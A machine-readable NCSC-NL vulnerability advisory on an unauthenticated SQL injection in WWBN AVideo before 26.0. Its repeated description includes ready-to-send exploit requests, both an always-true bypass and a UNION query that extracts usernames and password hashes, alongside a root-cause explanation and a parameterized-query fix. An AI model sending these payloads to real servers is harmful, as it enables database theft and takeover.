{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33352",
        "tracking": {
            "current_release_date": "2026-03-26T00:45:56.184705Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33352",
            "initial_release_date": "2026-03-21T01:08:18.691400Z",
            "revision_history": [
                {
                    "date": "2026-03-21T01:08:18.691400Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-21T01:08:22.304159Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-23T17:30:33.011747Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-23T17:30:38.319442Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-23T18:12:42.502161Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-23T18:12:44.755144Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T02:21:18.677696Z",
                    "number": "7",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-24T02:21:24.159284Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:56:13.971429Z",
                    "number": "9",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-24T20:57:33.093832Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T21:37:34.863831Z",
                    "number": "11",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-24T21:37:36.907416Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T20:11:48.921422Z",
                    "number": "13",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-25T20:11:53.518757Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:45:42.020382Z",
                    "number": "15",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "15"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<26.0",
                                "product": {
                                    "name": "vers:unknown/<26.0",
                                    "product_id": "CSAFPID-5874460",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.4",
                                "product": {
                                    "name": "vers:unknown/10.4",
                                    "product_id": "CSAFPID-5656122",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.8",
                                "product": {
                                    "name": "vers:unknown/10.8",
                                    "product_id": "CSAFPID-5656123",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11",
                                "product": {
                                    "name": "vers:unknown/11",
                                    "product_id": "CSAFPID-5656124",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1",
                                "product": {
                                    "name": "vers:unknown/11.1",
                                    "product_id": "CSAFPID-5656125",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1.1",
                                "product": {
                                    "name": "vers:unknown/11.1.1",
                                    "product_id": "CSAFPID-5656126",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.5",
                                "product": {
                                    "name": "vers:unknown/11.5",
                                    "product_id": "CSAFPID-5656127",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.6",
                                "product": {
                                    "name": "vers:unknown/11.6",
                                    "product_id": "CSAFPID-5656128",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/12.4",
                                "product": {
                                    "name": "vers:unknown/12.4",
                                    "product_id": "CSAFPID-5656129",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@12.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3",
                                "product": {
                                    "name": "vers:unknown/14.3",
                                    "product_id": "CSAFPID-5656130",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3.1",
                                "product": {
                                    "name": "vers:unknown/14.3.1",
                                    "product_id": "CSAFPID-5656131",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.4",
                                "product": {
                                    "name": "vers:unknown/14.4",
                                    "product_id": "CSAFPID-5656132",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/18.0",
                                "product": {
                                    "name": "vers:unknown/18.0",
                                    "product_id": "CSAFPID-5656133",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@18.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/21.0",
                                "product": {
                                    "name": "vers:unknown/21.0",
                                    "product_id": "CSAFPID-5721197",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@21.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/22.0",
                                "product": {
                                    "name": "vers:unknown/22.0",
                                    "product_id": "CSAFPID-5772271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@22.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/24.0",
                                "product": {
                                    "name": "vers:unknown/24.0",
                                    "product_id": "CSAFPID-5772272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@24.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/25.0",
                                "product": {
                                    "name": "vers:unknown/25.0",
                                    "product_id": "CSAFPID-5840723",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@25.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/26.0",
                                "product": {
                                    "name": "vers:unknown/26.0",
                                    "product_id": "CSAFPID-5878928",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@26.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=26.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<=26.0",
                                    "product_id": "CSAFPID-5878929"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "avideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33352",
            "cwe": {
                "id": "CWE-89",
                "name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "### Summary\n\nAn unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`.\n\n### Affected Component\n\n**File:** `objects/category.php`, lines 386-394, inside method `getAllCategories()`\n\n```php\nif (!empty($_REQUEST['doNotShowCats'])) {\n    $doNotShowCats = $_REQUEST['doNotShowCats'];\n    if (!is_array($_REQUEST['doNotShowCats'])) {\n        $doNotShowCats = array($_REQUEST['doNotShowCats']);\n    }\n    foreach ($doNotShowCats as $key => $value) {\n        $doNotShowCats[$key] = str_replace(\"'\", '', $value);  // INSUFFICIENT\n    }\n    $sql .= \" AND (c.clean_name NOT IN ('\" . implode(\"', '\", $doNotShowCats) . \"') )\";\n}\n```\n\n### Root Cause\n\n1. **Incomplete sanitization:** The only defense is `str_replace(\"'\", '', $value)`, which strips single-quote characters. It does **not** strip backslashes (`\\`).\n2. **No global filter coverage:** The `doNotShowCats` parameter is absent from every filter list in `objects/security.php` (`$securityFilter`, `$securityFilterInt`, `$securityRemoveSingleQuotes`, `$securityRemoveNonChars`, `$securityRemoveNonCharsStrict`, `$filterURL`, and the `_id` suffix pattern).\n3. **Direct string concatenation into SQL:** The filtered values are concatenated into the SQL query via `implode()` instead of using parameterized queries.\n\n### Exploitation\n\nMySQL, by default, treats the backslash (`\\`) as an escape character inside string literals (unless `NO_BACKSLASH_ESCAPES` SQL mode is enabled, which is uncommon). 
This allows a backslash in one array element to escape the closing single-quote that `implode()` adds, shifting the string boundary and turning the next array element into executable SQL.\n\n**Step-by-step:**\n\n1. The attacker sends:\n   ```\n   GET /categories.json.php?doNotShowCats[0]=\\&doNotShowCats[1]=)%20OR%201=1)--%20-\n   ```\n\n2. After `str_replace(\"'\", '', ...)`, values are unchanged (no single quotes to strip):\n   - Element 0: `\\`\n   - Element 1: `) OR 1=1)-- -`\n\n3. After `implode(\"', '\", ...)`, the concatenated string is:\n   ```\n   \\', ') OR 1=1)-- -\n   ```\n\n4. The full SQL becomes:\n   ```sql\n   AND (c.clean_name NOT IN ('\\', ') OR 1=1)-- -') )\n   ```\n\n5. MySQL parses this as:\n   - `'\\'` — the `\\` escapes the next `'`, making it a literal quote character inside the string. The string continues.\n   - `, '` — the comma and space are part of the string. The next `'` (which was the opening quote of element 1) **closes** the string.\n   - String value = `', ` (three characters: quote, comma, space)\n   - `) OR 1=1)` — executable SQL. The first `)` closes `NOT IN (`, the second `)` closes the outer `AND (`.\n   - `-- -` — SQL comment, discards the remainder `') )`\n\n   Effective SQL:\n   ```sql\n   AND (c.clean_name NOT IN (', ') OR 1=1)\n   ```\n   This always evaluates to `TRUE`.\n\n**For data extraction (UNION-based):**\n\n```\nGET /categories.json.php?doNotShowCats[0]=\\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20-\n```\n\nProduces:\n```sql\nAND (c.clean_name NOT IN ('\\', ')) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- -') )\n```\n\nThis appends a UNION query that extracts usernames and password hashes from the `users` table. 
The attacker must match the column count of the original `SELECT` (determinable through iterative probing).\n\n### Impact\n\n- **Confidentiality:** Full read access to the entire database, including user credentials, emails, private video metadata, API secrets, and plugin configuration.\n- **Integrity:** Ability to modify or delete any data in the database via stacked queries or subqueries (e.g., `UPDATE users SET isAdmin=1`).\n- **Availability:** Ability to drop tables or corrupt data.\n- **Potential RCE:** On MySQL configurations that allow `SELECT ... INTO OUTFILE`, the attacker could write a PHP web shell to the server's document root.\n\n### Suggested Fix\n\nReplace the string concatenation with parameterized queries:\n\n```php\nif (!empty($_REQUEST['doNotShowCats'])) {\n    $doNotShowCats = $_REQUEST['doNotShowCats'];\n    if (!is_array($doNotShowCats)) {\n        $doNotShowCats = array($doNotShowCats);\n    }\n    $placeholders = array_fill(0, count($doNotShowCats), '?');\n    $formats = str_repeat('s', count($doNotShowCats));\n    $sql .= \" AND (c.clean_name NOT IN (\" . implode(',', $placeholders) . \") )\";\n    // Pass $formats and $doNotShowCats to sqlDAL::readSql() as bind parameters\n}\n```\n\nAlternatively, use `$global['mysqli']->real_escape_string()` on each value as a minimum fix, though parameterized queries are strongly preferred.",
                    "title": "github - https://api.github.com/advisories/GHSA-mcj5-6qr4-95fj"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, an unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`. Version 26.0 contains a patch for the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33352"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, an unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`. Version 26.0 contains a patch for the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33352.json"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nAn unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`.\n\n### Affected Component\n\n**File:** `objects/category.php`, lines 386-394, inside method `getAllCategories()`\n\n```php\nif (!empty($_REQUEST['doNotShowCats'])) {\n    $doNotShowCats = $_REQUEST['doNotShowCats'];\n    if (!is_array($_REQUEST['doNotShowCats'])) {\n        $doNotShowCats = array($_REQUEST['doNotShowCats']);\n    }\n    foreach ($doNotShowCats as $key => $value) {\n        $doNotShowCats[$key] = str_replace(\"'\", '', $value);  // INSUFFICIENT\n    }\n    $sql .= \" AND (c.clean_name NOT IN ('\" . implode(\"', '\", $doNotShowCats) . \"') )\";\n}\n```\n\n### Root Cause\n\n1. **Incomplete sanitization:** The only defense is `str_replace(\"'\", '', $value)`, which strips single-quote characters. It does **not** strip backslashes (`\\`).\n2. **No global filter coverage:** The `doNotShowCats` parameter is absent from every filter list in `objects/security.php` (`$securityFilter`, `$securityFilterInt`, `$securityRemoveSingleQuotes`, `$securityRemoveNonChars`, `$securityRemoveNonCharsStrict`, `$filterURL`, and the `_id` suffix pattern).\n3. **Direct string concatenation into SQL:** The filtered values are concatenated into the SQL query via `implode()` instead of using parameterized queries.\n\n### Exploitation\n\nMySQL, by default, treats the backslash (`\\`) as an escape character inside string literals (unless `NO_BACKSLASH_ESCAPES` SQL mode is enabled, which is uncommon). 
This allows a backslash in one array element to escape the closing single-quote that `implode()` adds, shifting the string boundary and turning the next array element into executable SQL.\n\n**Step-by-step:**\n\n1. The attacker sends:\n   ```\n   GET /categories.json.php?doNotShowCats[0]=\\&doNotShowCats[1]=)%20OR%201=1)--%20-\n   ```\n\n2. After `str_replace(\"'\", '', ...)`, values are unchanged (no single quotes to strip):\n   - Element 0: `\\`\n   - Element 1: `) OR 1=1)-- -`\n\n3. After `implode(\"', '\", ...)`, the concatenated string is:\n   ```\n   \\', ') OR 1=1)-- -\n   ```\n\n4. The full SQL becomes:\n   ```sql\n   AND (c.clean_name NOT IN ('\\', ') OR 1=1)-- -') )\n   ```\n\n5. MySQL parses this as:\n   - `'\\'` — the `\\` escapes the next `'`, making it a literal quote character inside the string. The string continues.\n   - `, '` — the comma and space are part of the string. The next `'` (which was the opening quote of element 1) **closes** the string.\n   - String value = `', ` (three characters: quote, comma, space)\n   - `) OR 1=1)` — executable SQL. The first `)` closes `NOT IN (`, the second `)` closes the outer `AND (`.\n   - `-- -` — SQL comment, discards the remainder `') )`\n\n   Effective SQL:\n   ```sql\n   AND (c.clean_name NOT IN (', ') OR 1=1)\n   ```\n   This always evaluates to `TRUE`.\n\n**For data extraction (UNION-based):**\n\n```\nGET /categories.json.php?doNotShowCats[0]=\\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20-\n```\n\nProduces:\n```sql\nAND (c.clean_name NOT IN ('\\', ')) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- -') )\n```\n\nThis appends a UNION query that extracts usernames and password hashes from the `users` table. 
The attacker must match the column count of the original `SELECT` (determinable through iterative probing).\n\n### Impact\n\n- **Confidentiality:** Full read access to the entire database, including user credentials, emails, private video metadata, API secrets, and plugin configuration.\n- **Integrity:** Ability to modify or delete any data in the database via stacked queries or subqueries (e.g., `UPDATE users SET isAdmin=1`).\n- **Availability:** Ability to drop tables or corrupt data.\n- **Potential RCE:** On MySQL configurations that allow `SELECT ... INTO OUTFILE`, the attacker could write a PHP web shell to the server's document root.\n\n### Suggested Fix\n\nReplace the string concatenation with parameterized queries:\n\n```php\nif (!empty($_REQUEST['doNotShowCats'])) {\n    $doNotShowCats = $_REQUEST['doNotShowCats'];\n    if (!is_array($doNotShowCats)) {\n        $doNotShowCats = array($doNotShowCats);\n    }\n    $placeholders = array_fill(0, count($doNotShowCats), '?');\n    $formats = str_repeat('s', count($doNotShowCats));\n    $sql .= \" AND (c.clean_name NOT IN (\" . implode(',', $placeholders) . \") )\";\n    // Pass $formats and $doNotShowCats to sqlDAL::readSql() as bind parameters\n}\n```\n\nAlternatively, use `$global['mysqli']->real_escape_string()` on each value as a minimum fix, though parameterized queries are strongly preferred.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-mcj5-6qr4-95fj.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00029",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.4",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, Is related to CWE-89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')), There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5874460",
                    "CSAFPID-5656122",
                    "CSAFPID-5656123",
                    "CSAFPID-5656124",
                    "CSAFPID-5656125",
                    "CSAFPID-5656126",
                    "CSAFPID-5656127",
                    "CSAFPID-5656128",
                    "CSAFPID-5656129",
                    "CSAFPID-5656130",
                    "CSAFPID-5656131",
                    "CSAFPID-5656132",
                    "CSAFPID-5656133",
                    "CSAFPID-5721197",
                    "CSAFPID-5772271",
                    "CSAFPID-5772272",
                    "CSAFPID-5840723",
                    "CSAFPID-5878928",
                    "CSAFPID-5878929"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-mcj5-6qr4-95fj"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33352"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33352.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-mcj5-6qr4-95fj.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mcj5-6qr4-95fj"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-mcj5-6qr4-95fj"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/commit/206d38e97b8c854771bb2907b13f9f36e8bcf874"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33352"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 9.8,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-5656122",
                        "CSAFPID-5656123",
                        "CSAFPID-5656124",
                        "CSAFPID-5656125",
                        "CSAFPID-5656126",
                        "CSAFPID-5656127",
                        "CSAFPID-5656128",
                        "CSAFPID-5656129",
                        "CSAFPID-5656130",
                        "CSAFPID-5656131",
                        "CSAFPID-5656132",
                        "CSAFPID-5656133",
                        "CSAFPID-5721197",
                        "CSAFPID-5772271",
                        "CSAFPID-5772272",
                        "CSAFPID-5840723",
                        "CSAFPID-5874460",
                        "CSAFPID-5878928",
                        "CSAFPID-5878929"
                    ]
                }
            ],
            "title": "CVE-2026-33352"
        }
    ]
}